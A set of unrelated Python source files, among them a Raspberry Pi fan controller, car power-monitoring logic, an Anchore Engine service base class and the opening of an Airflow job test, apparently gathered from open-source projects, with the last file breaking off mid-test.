_w32j.AssignProcessToJobObject(hjob, hprocess)
g_hjob = hjob
except _w32j.error as e:
if (e._we != _we.ERROR_ACCESS_DENIED or
_sys.getwindowsversion() >= (6, 2) or
not _w32j.IsProcessInJob(hprocess, None)):
raise
_warn.warn('The process is already in a job. Nested jobs are not '
'supported prior to Windows 8.')
def limit_memory(memory_limit):
if g_hjob is None:
return
info = _w32j.QueryInformationJobObject(g_hjob,
_w32j.JobObjectExtendedLimitInformation)
info['ProcessMemoryLimit'] = memory_limit
info['BasicLimitInformation']['LimitFlags'] |= (
_w32j.JOB_OBJECT_LIMIT_PROCESS_MEMORY)
_w32j.SetInformationJobObject(g_hjob,
_w32j.JobObjectExtendedLimitInformation, info)
assign_job(create_job())
limit_memory(memory_limit)
def close():
_pg.quit()
quit()
def getEvents():
return _pg.event.get()
|
raspberrypi_dht11_acfan_controller.py
|
"""Main module."""
import os
# print(os.getpid())
import queue
import signal
import threading
import logging
import logging.config
from os import kill
from threading import Thread
# Import our packages
print("importing your libraries")
from bot import run_bot
from fan_caller import DHT11_Fan_caller
print("done!")
# Logger setup
logging.config.fileConfig('logging.conf')
logger = logging.getLogger('MAIN')
# ""MAIN""
def start():
'''
    Program start function: creates thread 1 running DHT11_Fan_caller and runs the bot in the main
    thread. Installs a SIGUSR1 signal handler that "sends" a flag telling fan_caller when to
    stop.
'''
# SIGUSR1 handler. Used to gently kill thread 1 when SIGINT or SIGTERM are called
# SIGUSR1 is sent from bot
def sigusr1_handler(*args):
logger.debug(
"Signal SIGUSR1 Received - Killing DHT11_Fan_caller process ")
print("signal received")
pill2kill.set()
# wait for t1 to end
t1.join()
# kill the rest of the program
logger.debug("Killing main module")
kill(os.getpid(), signal.SIGTERM)
signal.signal(signal.SIGUSR1, sigusr1_handler)
pill2kill = threading.Event()
q = queue.Queue()
t1 = Thread(target=DHT11_Fan_caller, args=(q, pill2kill))
t1.start()
run_bot(q)
if __name__ == '__main__':
logger.debug("__name__ == __main__ STARTING program")
start()
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
PANDA_OUTPUT_VOLTAGE = 5.28
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
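# (Added note) 0.091 follows from dt/tau / (dt/tau + 1), presumably with a 0.5 s update period:
# (0.5/5) / (0.5/5 + 1) = 0.1 / 1.1 ~= 0.091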
# A C2 uses about 1W while idling, and 30h seems like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
# Parameters
def get_battery_capacity():
return _read_param("/sys/class/power_supply/battery/capacity", int)
# Helpers
def _read_param(path, parser, default=0):
try:
with open(path) as f:
return parser(f.read())
except Exception:
return default
def panda_current_to_actual_current(panda_current):
# From white/grey panda schematic
return (3.3 - (panda_current * 3.3 / 4096)) / 8.25
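# (Added worked example, illustrative only) a raw reading of 2048 ADC counts maps to
# (3.3 - 2048 * 3.3 / 4096) / 8.25 = 1.65 / 8.25 = 0.2 A.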
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.car_voltage_instant_mV = 12e3 # Last value of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = pandaState.pandaState.voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (pandaState.pandaState.pandaType in [log.PandaState.PandaType.whitePanda, log.PandaState.PandaType.greyPanda]) and (pandaState.pandaState.current > 1):
# If white/grey panda, use the integrated current measurements if the measurement is not 0
# If the measurement is 0, the current is 400mA or greater, and out of the measurement range of the panda
# This seems to be accurate to about 5%
current_power = (PANDA_OUTPUT_VOLTAGE * panda_current_to_actual_current(pandaState.pandaState.current))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen
return should_shutdown
|
service.py
|
"""
Base types for all anchore engine services
"""
import copy
import enum
import json
import os
import threading
import time
from pathlib import Path
import connexion
import yaml
from flask import g, jsonify
from anchore_engine import monitors
from anchore_engine.apis.authorization import get_authorizer, init_authz_handler
from anchore_engine.apis.exceptions import AnchoreApiError
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services.catalog import CatalogClient
from anchore_engine.common.helpers import make_response_error
from anchore_engine.configuration import localconfig
from anchore_engine.configuration.localconfig import InvalidOauthConfigurationError
from anchore_engine.db import db_services
from anchore_engine.db import initialize as initialize_db
from anchore_engine.db import session_scope
from anchore_engine.subsys import logger, metrics, servicestatus, taskstate
from anchore_engine.subsys.events import ServiceAuthzPluginHealthCheckFailed
from anchore_engine.subsys.identities import manager_factory
class LifeCycleStages(enum.IntEnum):
"""
Ordered lifecycle stages by execution order
"""
pre_config = 0
post_config = 1
pre_db = 2
post_db = 3
pre_credentials = 4
post_credentials = 5
pre_bootstrap = 6
post_bootstrap = 7
pre_register = 8
post_register = 9
# Default handlers set at system level, will be modified by instantiation of BaseService at instance-level
_default_lifecycle_handlers = {
LifeCycleStages.pre_config: [],
LifeCycleStages.post_config: [],
LifeCycleStages.pre_db: [],
LifeCycleStages.post_db: [],
LifeCycleStages.pre_credentials: [],
LifeCycleStages.post_credentials: [],
LifeCycleStages.pre_bootstrap: [],
LifeCycleStages.post_bootstrap: [],
LifeCycleStages.pre_register: [],
LifeCycleStages.post_register: [],
}
def handle_api_exception(ex: AnchoreApiError):
"""
Returns the proper json for marshalling an AnchoreApiError
:param ex:
:return:
"""
return (
jsonify(
make_response_error(
ex.message,
in_httpcode=ex.__response_code__,
details=ex.detail if ex.detail else {},
)
),
ex.__response_code__,
)
class ServiceMeta(type):
"""
Metaclass to create a registry for all subclasses of Gate for finding, building, and documenting the services
"""
def __init__(cls, name, bases, dct):
if not hasattr(cls, "registry"):
cls.registry = {}
else:
if "__service_name__" in dct:
svc_id = dct["__service_name__"].lower()
cls.registry[svc_id] = cls
super(ServiceMeta, cls).__init__(name, bases, dct)
def get_service_by_name(cls, name):
# Try direct name
found = cls.registry.get(name.lower())
if found:
return found
else:
raise KeyError(name)
def registered_service_types(cls):
return list(cls.registry.keys())
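# Illustrative registry sketch (added; hypothetical subclass, not part of this module):
# any subclass that defines __service_name__ is auto-registered by ServiceMeta, so
# lookups work roughly like:
#
#     class ExampleService(BaseService):
#         __service_name__ = "example"
#
#     BaseService.get_service_by_name("example")   # -> ExampleService
#     BaseService.registered_service_types()       # -> ["example", ...]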
class BaseService(object, metaclass=ServiceMeta):
"""
Base type for all services to inherit from.
An anchore engine service always has:
healthcheck api - GET /health responds with 200 OK.
monitor thread - to schedule async tasks and handle service status updates upstream
versioned api - /vX/...
Services have similar bootstrap and initialization path:
self.configure() - load config
self.db_connect() - setup db connections
self.credential_init() - load system credentials
self.bootstrap() - service-specific bootstrap that involves db and maybe other services
self.register() - register the service in the db for discoverability
These are all invoked in order from the bootstrap() function directly.
Class variables:
        __is_unique_service__ = if True, only a single instance of this service may be registered in the system.
__service_name__ = The name used to identify this service class in both the service records and in config.
        __db_enabled__ = True|False determines if this service depends on the db and should connect (default = True)
__monitors__ = Dict of monitor configurations for this service
__monitor_fn__ = Function to invoke as base thread monitor
__service_api_version__ = str version name to use as prefix for api calls: e.g. /<__service_api_version__>/images
__lifecycle_handlers__ = dict of mappings from LifeCycleStages to (function, arg) pairs to merge into the global defaults on instantiation
"""
__is_unique_service__ = False
__service_name__ = None
__db_enabled__ = True
__monitors__ = {}
__monitor_fn__ = monitors.monitor
__service_api_version__ = "v1"
__lifecycle_handlers__ = {}
__require_system_user__ = True
__task_handlers_enabled__ = True
def __init__(self, options=None):
self.name = self.__service_name__
self.options = options if options is not None else {}
self.global_configuration = None
self.requires_db = None
self.require_system_user = self.__require_system_user__
self.lifecycle_handlers = copy.deepcopy(_default_lifecycle_handlers)
self.lifecycle_handlers.update(self.__lifecycle_handlers__)
self.instance_id = None
self.versions = None
self.configuration = None
self.fq_name = None
self.monitor_fn = self.__monitor_fn__
self.monitor_kwargs = {}
self.monitor_threads = {}
self.service_record = {}
self.task_handlers_enabled = self.__task_handlers_enabled__
@property
def is_enabled(self):
if self.configuration:
return self.configuration.get("enabled", False)
else:
return False
def _register_instance_handlers(self):
"""
Called before the bootstrap process is initiated to allow overriding classes to modify the handlers
:return:
"""
return
def _process_stage_handlers(self, stage):
logger.info(
"Processing init handlers for bootsrap stage: {}".format(stage.name)
)
handlers = self.lifecycle_handlers.get(stage, [])
logger.debug("Executing {} stage {} handlers".format(len(handlers), stage.name))
for handler_fn, handler_args in handlers:
try:
logger.debug(
"Invoking handler: {} with args {}".format(
handler_fn.__name__, handler_args
)
)
if handler_args is not None:
handler_fn(*handler_args)
else:
handler_fn()
                logger.debug(
                    "Handler: {} completed successfully".format(
                        handler_fn.__name__
                    )
                )
except Exception as ex:
logger.exception(
"Pre-Stage Handler {} for service pre_config raised exception".format(
handler_fn.__name__
)
)
raise ex
def register_handler(self, stage, handler_fn, handler_args=None):
"""
Register handlers for specific lifecycle stages
:param stage: LifeCycleState enum obj to register for
:param handler_fn: function to invoke
:param handler_args: list of arguments to pass to the handler in order handler_fn(*handler_args)
:return:
"""
assert isinstance(stage, LifeCycleStages)
if stage in self.lifecycle_handlers:
self.lifecycle_handlers[stage].append((handler_fn, handler_args))
else:
raise KeyError(stage)
def _get_service_configuration(self, global_config):
"""
Extract service config from the global config.
Override or supplement this function if a service needs configuration that isn't strictly in its 'service' entry.
        Should be a very rare occurrence.
:param global_config:
:return: service configuration for this service
"""
assert self.__service_name__ in global_config["services"]
return global_config["services"][self.__service_name__]
def configure(self):
self._process_stage_handlers(LifeCycleStages.pre_config)
self._configure()
self._process_stage_handlers(LifeCycleStages.post_config)
def _init_versions(self):
"""
Initialize the service versions
:return:
"""
try:
self.versions = localconfig.get_versions()
except Exception as err:
logger.error("cannot detect versions of service: exception - " + str(err))
raise err
def _configure(self):
"""
Load service configuration
:return:
"""
logger.info("Loading and initializing global configuration")
self._init_versions()
self.configuration = self._get_service_configuration(self.global_configuration)
self.instance_id = localconfig.get_host_id()
self.fq_name = (self.name, self.instance_id)
self.task_handlers_enabled = self.configuration.get(
"task_handlers_enabled", True
)
env_setting = (
not os.environ.get("ANCHORE_ENGINE_DISABLE_MONITORS", "false").lower()
== "true"
)
self.task_handlers_enabled = self.task_handlers_enabled and env_setting
if not self.task_handlers_enabled:
if env_setting:
logger.warn(
"Task handlers disabled by setting ANCHORE_ENGINE_DISABLE_MONITORS in environment"
)
else:
logger.warn("Task handlers disabled by configuration file value")
try:
kick_timer = int(self.configuration["cycle_timer_seconds"])
        except Exception:
kick_timer = 1
try:
cycle_timers = {}
cycle_timers.update(self.configuration["cycle_timers"])
        except Exception:
cycle_timers = {}
self.monitor_kwargs["kick_timer"] = kick_timer
self.monitor_kwargs["cycle_timers"] = cycle_timers
self.monitor_kwargs["monitors"] = copy.deepcopy(self.__monitors__)
self.monitor_kwargs["monitor_threads"] = self.monitor_threads
self.monitor_kwargs["servicename"] = self.name
logger.info("Configuration complete")
def db_connect(self):
self._process_stage_handlers(LifeCycleStages.pre_db)
self._db_connect()
self._process_stage_handlers(LifeCycleStages.post_db)
def _db_connect(self):
"""
Initialize the db connection and prepare the db
:return:
"""
logger.info("Configuring db connection")
        if not self.requires_db:
logger.info(
"DB Connection disabled in configuration for service {}. Skipping db init".format(
self.__service_name__
)
)
return True
logger.info("Initializing database")
# connect to DB
try:
initialize_db(localconfig=self.global_configuration, versions=self.versions)
except Exception as err:
logger.error("cannot connect to configured DB: exception - " + str(err))
raise err
logger.info("DB connection initialization complete")
def credential_init(self):
self._process_stage_handlers(LifeCycleStages.pre_credentials)
self._credential_init()
self._process_stage_handlers(LifeCycleStages.post_credentials)
def _credential_init(self):
logger.info("Bootstrapping credentials")
# credential bootstrap
self.global_configuration["system_user_auth"] = (None, None)
if self.require_system_user:
gotauth = False
max_retries = 60
self.global_configuration["system_user_auth"] = (None, None)
for count in range(1, max_retries):
try:
with session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
logger.info("Checking system creds")
c = mgr.get_system_credentials()
if c is not None:
logger.info("Found valid system creds")
gotauth = True
break
else:
logger.info("Did not find valid system creds")
logger.error(
"cannot get system user auth credentials yet, retrying ("
+ str(count)
+ " / "
+ str(max_retries)
+ ")"
)
time.sleep(5)
except InvalidOauthConfigurationError:
raise
except Exception as err:
logger.exception(
"cannot get system-user auth credentials - service may not have system level access"
)
self.global_configuration["system_user_auth"] = (None, None)
gotauth = False
if not gotauth:
raise Exception("service requires system user auth to start")
logger.info("Credential initialization complete")
def bootstrap(self):
self._process_stage_handlers(LifeCycleStages.pre_bootstrap)
self._bootstrap()
self._process_stage_handlers(LifeCycleStages.post_bootstrap)
def _bootstrap(self):
"""
Create and init the service
:return:
"""
# Do monitor-thread bootstraps here
logger.info("Bootstrapping service")
logger.info("Service bootstrap complete")
return True
def register(self):
self._process_stage_handlers(LifeCycleStages.pre_register)
self._register()
self._process_stage_handlers(LifeCycleStages.post_register)
def _register(self):
if not self.is_enabled:
logger.error(
"Service not enabled in config, not registering service: " + self.name
)
raise Exception("No service enabled, cannot continue bootstrap")
logger.info("Registering service: {}".format(self.name))
service_template = {
"type": "anchore",
"base_url": "N/A",
"status_base_url": "N/A",
"version": "v1",
"short_description": "",
}
hstring = "http"
if "external_tls" in self.configuration:
if self.configuration.get("external_tls", False):
hstring = "https"
elif "ssl_enable" in self.configuration:
if self.configuration.get("ssl_enable", False):
hstring = "https"
endpoint_hostname = endpoint_port = endpoint_hostport = None
if self.configuration.get("external_hostname", False):
endpoint_hostname = self.configuration.get("external_hostname")
elif self.configuration.get("endpoint_hostname", False):
endpoint_hostname = self.configuration.get("endpoint_hostname")
if self.configuration.get("external_port", False):
endpoint_port = int(self.configuration.get("external_port"))
elif self.configuration.get("port", False):
endpoint_port = int(self.configuration.get("port"))
if endpoint_hostname:
endpoint_hostport = endpoint_hostname
if endpoint_port:
endpoint_hostport = endpoint_hostport + ":" + str(endpoint_port)
if endpoint_hostport:
service_template["base_url"] = "{}://{}".format(hstring, endpoint_hostport)
else:
raise Exception(
"could not construct service base_url - please check service configuration for hostname/port settings"
)
try:
service_template["status"] = False
service_template["status_message"] = taskstate.base_state("service_status")
with session_scope() as dbsession:
service_records = db_services.get_byname(
self.__service_name__, session=dbsession
)
# fail if trying to add a service that must be unique in the system, but one already is registered in DB
if self.__is_unique_service__:
if len(service_records) > 1:
raise Exception(
"more than one entry for service type ("
+ str(self.__service_name__)
+ ") exists in DB, but service must be unique - manual DB intervention required"
)
for service_record in service_records:
if service_record and (
service_record["hostid"] != self.instance_id
):
raise Exception(
"service type ("
+ str(self.__service_name__)
+ ") already exists in system with different host_id - detail: my_host_id="
+ str(self.instance_id)
+ " db_host_id="
+ str(service_record["hostid"])
)
# if all checks out, then add/update the registration
ret = db_services.add(
self.instance_id,
self.__service_name__,
service_template,
session=dbsession,
)
try:
my_service_record = {
"hostid": self.instance_id,
"servicename": self.__service_name__,
}
my_service_record.update(service_template)
servicestatus.set_my_service_record(my_service_record)
self.service_record = my_service_record
except Exception as err:
logger.warn(
"could not set local service information - exception: {}".format(
str(err)
)
)
except Exception as err:
raise err
service_record = servicestatus.get_my_service_record()
servicestatus.set_status(
service_record,
up=True,
available=True,
update_db=True,
versions=self.versions,
)
logger.info("Service registration complete")
return True
def initialize(
self, global_configuration, db_connect=True, require_system_user_auth=None
):
"""
Service initialization that requires the service config loaded and available but before registration of the service
or db connection and access to service discovery.
        :param global_configuration: dict of configuration data to use
        :param db_connect: override the __db_enabled__ class variable just for this instance. If false, no db init or connect is performed on bootstrap
        :param require_system_user_auth: override the __require_system_user__ class variable just for this instance
:return: True on success
"""
self.global_configuration = global_configuration
self.requires_db = db_connect
if require_system_user_auth is not None:
self.require_system_user = require_system_user_auth
logger.debug("Invoking instance-specific handler registration")
self._register_instance_handlers()
self.configure()
self.db_connect()
self.credential_init()
self.bootstrap()
self.register()
return True
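    # Illustrative usage sketch (added; hypothetical names, not from the original source):
    #
    #     svc = SomeConcreteService()
    #     svc.initialize(global_config)          # config -> db -> creds -> bootstrap -> register
    #     t = svc.get_monitor_thread()
    #     if t is not None:
    #         t.start()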
def get_monitor_thread(self, monitor_thread_wrapper=None):
"""
Start the service and return a thread to execute the monitor. Caller must actually start the monitor thread for this service.
:param monitor_thread_wrapper: function that takes the target function and **kwargs as arguments and returns an object expected by the caller
:return:
"""
if self.task_handlers_enabled:
if monitor_thread_wrapper:
t = monitor_thread_wrapper(self.monitor_fn, **self.monitor_kwargs)
else:
t = threading.Thread(target=self.monitor_fn, kwargs=self.monitor_kwargs)
return t
else:
return None
class ApiService(BaseService):
"""
A service that provides an api
"""
__spec_dir__ = "swagger"
__spec_file__ = "swagger.yaml"
__service_api_version__ = "v1"
def __init__(self, options=None):
super().__init__(options=options)
self._api_application = None
self.yosai = None
def _register_instance_handlers(self):
super()._register_instance_handlers()
logger.info("Registering api handlers")
self.register_handler(LifeCycleStages.pre_bootstrap, self.initialize_api, None)
def _init_wsgi_app(self, service_name, api_spec_dir=None, api_spec_file=None):
"""
Return an initialized service with common api resource and auth config
:return:
"""
try:
enable_swagger_ui = False
if self.configuration.get("enable_swagger_ui", None) is not None:
enable_swagger_ui = self.configuration.get("enable_swagger_ui")
elif self.global_configuration.get("enable_swagger_ui", None) is not None:
enable_swagger_ui = self.global_configuration.get("enable_swagger_ui")
flask_app_options = {"swagger_ui": enable_swagger_ui}
self._application = connexion.FlaskApp(
__name__, specification_dir=api_spec_dir, options=flask_app_options
)
flask_app = self._application.app
flask_app.url_map.strict_slashes = False
# Ensure jsonify() calls add whitespace for nice error responses
flask_app.config["JSONIFY_PRETTYPRINT_REGULAR"] = True
# Suppress some verbose logs in dependencies
import logging as py_logging
py_logging.basicConfig(level=py_logging.ERROR)
# Initialize the authentication system
self.init_auth()
flask_app.before_request(self._inject_service)
flask_app.register_error_handler(AnchoreApiError, handle_api_exception)
metrics.init_flask_metrics(flask_app, servicename=service_name)
self._application.add_api(
Path(api_spec_file),
validate_responses=self.options.get("validate-responses"),
)
return self._application
except Exception as err:
logger.exception("Error initializing WSGI application")
raise
def init_auth(self):
"""
Initializes the authentication subsystem as needed
:return:
"""
# Initialize the wrapper
init_authz_handler(configuration=self.configuration)
def _inject_service(self):
"""
Adds a reference to the service object into the request's app context
:return:
"""
g.service = self
def initialize_api(self):
"""
Initialize the api and return the wsgi application object
:return:
"""
logger.info(
"Initializing API from: {}/{}".format(self.__spec_dir__, self.__spec_file__)
)
if (
self.configuration["listen"]
and self.configuration["port"]
and self.configuration["endpoint_hostname"]
):
if not self._api_application:
self._api_application = self._init_wsgi_app(
self.__service_name__, self.__spec_dir__, self.__spec_file__
)
def get_api_application(self):
if self._api_application is None:
raise Exception(
"API not initialized yet. Must initialize the service or call initialize_api() before the application is available"
)
return self._api_application.app
@staticmethod
def build_authz_heartbeat(service_name):
"""
        Returns the handler function itself (uses a closure to pass some values in).
:return:
"""
def authz_heartbeat(*args, **kwargs):
cycle_timer = kwargs["mythread"]["cycle_timer"]
logger.info("Checking authz availability")
try:
host_id = localconfig.get_host_id()
authz_handlr = get_authorizer()
handler = authz_handlr.__class__.__name__
ex = None
try:
result = authz_handlr.healthcheck()
except Exception as e:
ex = e
result = False
if not result:
fail_event = ServiceAuthzPluginHealthCheckFailed(
user_id=localconfig.ADMIN_ACCOUNT_NAME,
name=service_name,
host=host_id,
plugin=handler,
details=str(ex),
)
logger.info(
"Sending healthcheck failure event: {}".format(
fail_event.__event_type__
)
)
try:
client = internal_client_for(
CatalogClient, localconfig.ADMIN_ACCOUNT_NAME
)
client.add_event(fail_event)
except Exception as ex:
logger.exception(
"Failure to send authz healthcheck failure event: {}".format(
fail_event.to_json()
)
)
except Exception as e:
logger.exception(
"Caught unexpected exception from the authz heartbeat handler"
)
time.sleep(cycle_timer)
return True
return authz_heartbeat
class UserFacingApiService(ApiService):
def __init__(self, options=None):
super().__init__(options)
self._authz_actions = {}
self.api_spec = None
def _register_instance_handlers(self):
super()._register_instance_handlers()
self.register_handler(
LifeCycleStages.pre_bootstrap, self._process_api_spec, None
)
@staticmethod
def parse_swagger(path):
with open(path) as f:
if path.endswith("yaml") or path.endswith("yml"):
return yaml.safe_load(f)
else:
return json.load(f)
@staticmethod
def build_action_map(swagger_content):
"""
        Given a dict from the swagger spec (must be fully materialized, no external refs), determine the mapping
        of an operation to an action using x-anchore-authz-action labels in the swagger.
This relies on using connexion such that the x-swagger-router-controller + operationId define the key as is implemented
in connexion. The resulting dict maps a fully-qualified function to an action
:param swagger_content: dict
:return: dict function_name -> action (e.g. anchore_engine.services.apiext.images.list_images -> listImages)
"""
action_map = {}
for path in swagger_content.get("paths").values():
for verb in path.values():
action = verb.get("x-anchore-authz-action")
controller = verb.get("x-swagger-router-controller")
operationId = verb.get("operationId")
action_map[controller + "." + operationId] = action
return action_map
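        # Illustrative example (added, following the docstring above): for a swagger path entry like
        #   /images:
        #     get:
        #       x-swagger-router-controller: anchore_engine.services.apiext.images
        #       operationId: list_images
        #       x-anchore-authz-action: listImages
        # the resulting map contains
        #   {"anchore_engine.services.apiext.images.list_images": "listImages"}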
def _process_api_spec(self):
try:
self.api_spec = UserFacingApiService.parse_swagger(
os.path.join(self.__spec_dir__, self.__spec_file__)
)
actions = UserFacingApiService.build_action_map(self.api_spec)
missing = [x for x in filter(lambda x: x[1] is None, actions.items())]
if missing:
raise Exception(
"API Spec validation error: All operations must have a x-anchore-authz-action label. Missing for: {}".format(
missing
)
)
else:
self._authz_actions = actions
except Exception as ex:
logger.exception(
"Error loading swagger spec for authz action parsing. Cannot proceed"
)
raise ex
def action_for_operation(self, fq_operation_id):
"""
Raises KeyError if id not found
:param fq_operation_id:
:return:
"""
return self._authz_actions[fq_operation_id]
|
test_local_task_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import os
import time
import unittest
from mock import patch
from airflow import AirflowException, models, settings
from airflow.configuration import conf
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs import LocalTaskJob
from airflow.models import DAG, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from tests.test_utils.db import clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_runs()
patcher = patch('airflow.jobs.base_job.sleep')
self.addCleanup(patcher.stop)
self.mock_base_job_sleep = patcher.start()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
